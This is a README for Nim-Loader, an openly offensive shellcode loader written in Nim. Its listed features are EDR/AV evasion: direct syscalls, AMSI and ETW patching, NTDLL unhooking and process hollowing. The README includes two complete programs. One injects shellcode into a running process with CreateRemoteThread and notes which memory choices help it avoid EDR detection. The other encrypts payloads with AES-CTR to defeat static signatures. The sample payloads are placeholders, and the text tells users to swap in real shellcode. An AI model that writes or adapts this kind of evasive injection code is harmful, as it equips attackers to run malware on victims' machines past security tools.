Nim-Loader - WIP Shellcode Loader In Nim With EDR Evasion Techniques


A very rough work-in-progress adventure into learning Nim by cobbling resources together to create a shellcode loader that implements common EDR/AV evasion techniques.

This is a mess and is for research purposes only! Please don't expect it to compile and run without your own modifications.


Instructions

  • Replace the byte array in loader.nim with your own x64 shellcode
  • Compile the EXE and run it: nim c -d:danger -d:strip --opt:size "loader.nim"
  • Adjust the target process for injection in the .nim files under the injection folder for the method you are using.
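
The three steps above worked as one complete program. This is an added example, not Nim-Loader's own injection code: it takes the plain Win32 CreateRemoteThread path (OpenProcess, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, CreateRemoteThread) rather than the project's syscall stubs, picks the target by image name instead of by editing a .nim file, and assumes Windows x64, the winim package (nimble install winim) and a constructed 4-byte placeholder in place of real shellcode.

```nim
# Added example, not part of Nim-Loader. Windows x64 only; needs winim.
import winim/lean, winim/inc/tlhelp32
import os, strutils

# Constructed placeholder payload: x64 `nop; nop; int3; ret`. It only traps into a
# debugger if one is attached. Replace it with real x64 shellcode, as the Instructions say.
var shellcode: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]

proc findPid(imageName: string): DWORD =
  ## Walk the process list and return the first PID whose image name matches
  ## (case-insensitive), or 0 when no such process is running.
  let snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
  if snap == INVALID_HANDLE_VALUE:
    raise newException(OSError, "CreateToolhelp32Snapshot failed: " & $GetLastError())
  defer: CloseHandle(snap)
  var entry: PROCESSENTRY32
  entry.dwSize = DWORD(sizeof(PROCESSENTRY32))
  var more = Process32First(snap, addr entry)
  while more != 0:
    # szExeFile is a null-terminated UTF-16 array; image names are ASCII in practice.
    let raw = cast[ptr UncheckedArray[uint16]](addr entry.szExeFile[0])
    var name = ""
    for i in 0 ..< entry.szExeFile.len:
      let c = raw[i]
      if c == 0: break
      name.add(if c < 128: char(c) else: '?')
    if cmpIgnoreCase(name, imageName) == 0:
      return entry.th32ProcessID
    more = Process32Next(snap, addr entry)
  return 0

proc inject(pid: DWORD, code: openArray[byte]) =
  ## Allocate RW in the target, copy the payload, flip the page to RX, start a thread on it.
  if code.len == 0:
    raise newException(ValueError, "empty payload")
  # Only the rights the four calls below need, not PROCESS_ALL_ACCESS.
  let rights = PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_CREATE_THREAD or
               PROCESS_QUERY_INFORMATION
  let hProc = OpenProcess(DWORD(rights), FALSE, pid)
  if hProc == 0:
    raise newException(OSError, "OpenProcess failed: " & $GetLastError())
  defer: CloseHandle(hProc)
  # RW first, RX after the write: a fresh RWX region is a cheap signal for an EDR.
  let remote = VirtualAllocEx(hProc, nil, SIZE_T(code.len),
                              DWORD(MEM_COMMIT or MEM_RESERVE), PAGE_READWRITE)
  if remote.isNil:
    raise newException(OSError, "VirtualAllocEx failed: " & $GetLastError())
  var written: SIZE_T
  if WriteProcessMemory(hProc, remote, unsafeAddr code[0], SIZE_T(code.len), addr written) == 0 or
     written != SIZE_T(code.len):
    raise newException(OSError, "WriteProcessMemory failed: " & $GetLastError())
  var oldProt: DWORD
  if VirtualProtectEx(hProc, remote, SIZE_T(code.len), PAGE_EXECUTE_READ, addr oldProt) == 0:
    raise newException(OSError, "VirtualProtectEx failed: " & $GetLastError())
  let hThread = CreateRemoteThread(hProc, nil, 0, cast[LPTHREAD_START_ROUTINE](remote), nil, 0, nil)
  if hThread == 0:
    raise newException(OSError, "CreateRemoteThread failed: " & $GetLastError())
  defer: CloseHandle(hThread)
  WaitForSingleObject(hThread, INFINITE)

when isMainModule:
  # Usage: inject.exe [image name]; defaults to notepad.exe (assumed to be running).
  let target = if paramCount() >= 1: paramStr(1) else: "notepad.exe"
  let pid = findPid(target)
  if pid == 0:
    quit(target & " is not running", 1)
  echo "injecting ", shellcode.len, " bytes into ", target, " (pid ", pid, ")"
  inject(pid, shellcode)
```

Build it with the same flags as the Instructions (nim c -d:danger -d:strip --opt:size inject.nim) and run inject.exe notepad.exe. Two choices are deliberate: the process handle asks only for the rights the four calls need, and the region is allocated RW and flipped to RX after the write, since a freshly allocated RWX region in a remote process is one of the cheapest signals an EDR has.
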

Completed Features

  • Direct syscalls dynamically resolved from NTDLL (Thanks @ShitSecure)
  • AMSI and ETW patching (Thanks @byt3bl33d3r)
  • NTDLL unhooking (Thanks @MrUn1k0d3r)
  • CreateRemoteThread injection (Thanks @byt3bl33d3r, @ShitSecure)

WIP Features

  • Process Hollowing Technique (Thanks @snovvcrash)
  • Shellcode encryption/decryption using AES in CTR mode (https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_(CTR)) (Thanks @snovvcrash)
  • Replace all compatible API calls with syscalls
  • Add template generator and compiler, cmdline args for shellcode, injection methods, process paths, etc.

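The AES-CTR shellcode encryption feature, as an added example (not the project's own code): encrypt the payload at build time with a fresh key and IV, store only the ciphertext and IV in the binary, and reverse it at runtime. Assumes the nimcrypto package (nimble install nimcrypto) and a constructed 8-byte stand-in payload; it runs on any platform nimcrypto supports.

```nim
# Added example, not part of Nim-Loader. Needs nimcrypto.
import nimcrypto

# Constructed stand-in for the payload; in the loader this is the shellcode byte array.
const payload = [byte 0x48, 0x83, 0xEC, 0x28, 0x48, 0x31, 0xC0, 0xC3]

proc aesCtr(key: array[32, byte], iv: array[16, byte], data: openArray[byte]): seq[byte] =
  ## AES-256-CTR: XOR the data with AES(key, iv+counter). CTR is symmetric, so this
  ## same call both encrypts and decrypts.
  var ctx: CTR[aes256]
  ctx.init(key, iv)
  result = newSeq[byte](data.len)
  if data.len > 0:
    ctx.encrypt(data, result)
  ctx.clear()                    # wipe the expanded key schedule

when isMainModule:
  var key: array[32, byte]
  var iv: array[16, byte]
  # A fresh random key and IV per build. A reused key+IV pair under CTR leaks the XOR of
  # the two plaintexts, so never hard-code one IV across payloads.
  doAssert randomBytes(key) == key.len
  doAssert randomBytes(iv) == iv.len

  let enc = aesCtr(key, iv, payload)
  echo "key: ", key.toHex
  echo "iv:  ", iv.toHex
  echo "enc: ", enc.toHex          # this ciphertext plus the IV is what goes into the loader
  let dec = aesCtr(key, iv, enc)
  doAssert dec == @payload
  echo "roundtrip ok"
```

CTR provides confidentiality only: a bit flip in the stored ciphertext flips the same bit in the decrypted shellcode with nothing to detect it, so add a hash or MAC check before executing the buffer if integrity matters. Where the key lives is the real design question for a loader; embedding it next to the ciphertext defeats static signatures on the payload bytes but nothing more.
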
Obfuscation

  • Consider using denim by @LittleJoeTables for obfuscator-llvm Nim compilation support!

References & Inspiration

  • OffensiveNim by Marcello Salvati (@byt3bl33d3r)
  • NimlineWhispers2 by Alfie Champion (@ajpc500)
  • SysWhispers3 by klezVirus (@KlezVirus)
  • NimPackt-v1 by Cas van Cooten (@chvancooten)
  • unhook_bof.c by Mr. Un1k0d3r (@MrUn1k0d3r)
  • NimGetSyscallStub by S3cur3Th1sSh1t (@ShitSecure)
  • NimHollow by snovvcrash (@snovvcrash)

Examples